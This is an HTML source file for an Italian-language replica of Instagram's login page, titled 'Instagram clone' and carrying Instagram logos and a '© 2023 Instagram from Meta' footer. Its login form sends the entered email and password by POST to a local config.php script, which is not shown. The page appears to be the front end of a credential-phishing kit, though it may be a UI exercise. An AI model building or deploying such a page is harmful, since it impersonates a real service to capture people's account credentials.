<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./styles.css" />
    <title>Instagram clone</title>
</head>
<body>
    <main class="flex align-items-center justify-content-center">
        <section id="mobile" class="flex">
        </section>
        <section id="auth" class="flex direction-column">
            <div class="panel login flex direction-column">
                <h1 title="Instagram" class="flex justify-content-center">
                    <img src="./img//instagram-logo.png" alt="Instagram logo" title="Instagram logo" />
                </h1>
                <form action="config.php" method="post">
                    <label for="email" class="sr-only">Numero di telefono, nome utente o e-mail</label>
                    <input name="email" placeholder="Numero di telefono, nome utente o e-mail" />

                    <label for="password" class="sr-only">password</label>
                    <input name="password" type="password" placeholder="password" />

                    <button type="submit">Accedi</button>
                </form>
                <div class="flex separator align-items-center">
                    <span></span>
                    <div class="or">O</div>
                    <span></span>
                </div>
                <div class="login-with-fb flex direction-column align-items-center">
                    <div>
                        <img />
                        <a>Accedi con Facebook</a>
                    </div>
                    <a href="#">Password dimenticata?</a>
                </div>
            </div>
            <div class="panel register flex justify-content-center">
                <p>Non hai un account?</p>
                <a href="#">Registrati</a>
            </div>
            <div class="app-download flex direction-column align-items-center">
                <p>Scarica l'APP.</p>
                <div class="flex justify-content-center">
                    <img src="./img/apple-button.png"      alt="Imagem com a logo da Apple Store" title="Imagem com a logo da Apple Store" />
                    <img src="./img/googleplay-button.png" alt="Imagem com a logo da Google Play" title="Imagem com a logo da Google Play" />
                </div>
            </div>
        </section>
    </main>
    <footer>
        <ul class="flex flex-wrap justify-content-center">
            <li><a href="#">META</a></li>
            <li><a href="#">Informazioni</a></li>
            <li><a href="#">Blog</a></li>
            <li><a href="#">API</a></li>
            <li><a href="#">Condizioni</a></li>
            <li><a href="#">Privacy</a></li>
            <li><a href="#">Termini</a></li>
            <li><a href="#">Luighi</a></li>
            <li><a href="#">Instagram Lite</a></li>
            <li><a href="#">Meta Verified</a></li>
            <li><a href="#">Lingua</a></li>
        </ul>
        <p class="copyright">© 2023 Instagram from Meta</p>
    </footer>
</body>
</html>